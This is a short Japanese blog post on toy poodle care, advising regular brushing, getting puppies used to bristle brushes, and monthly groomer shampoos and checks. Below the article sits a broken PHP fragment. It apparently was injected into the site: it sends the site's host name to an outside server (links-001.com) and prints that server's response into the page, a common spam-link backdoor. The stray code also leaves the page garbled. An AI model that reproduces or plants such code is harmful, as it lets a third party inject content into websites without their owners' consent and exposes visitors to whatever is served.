トイプードルはブラッシングとシャンプーが大事

トイプードル

トイプードルはブラッシングとシャンプーが大事

トイプードルを飼うとなると、大事なことはボディケアになります。
そのどこまでも伸びて行くシングルコートの毛は、常に清潔にしてあげておくべきです。
このシングルコートの毛は、非常に抜けづらくなっていることから、見た目以上に毛が落ちることがありません。
しかしそのまま放っておくことで、巻き毛に毛玉出来てしまい、最悪の場合には皮膚疾患を起こすことも考えられます。
そのため清潔さを保つためにも、散歩帰りなどにはブラッシングをキチンとして、毛のもつれをほどくようにして下さい。
子犬の時には、獣毛ブラシを使用し、ブラッシングに慣れるようにします。
ブラッシングを嫌がらない癖をつけることも、飼い主の大事な役目になります。
またトイプードルは、定期的にトリマーに観てもらう必要もあります。
皮膚などに異常がないのかを、観てもらうべきです。
そしてトリマーが行うシャンプーは、月に一度は最低でも必要です。
せっかくの可愛毛並みをキチンと保つには、早めのトリミングも必要とされます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事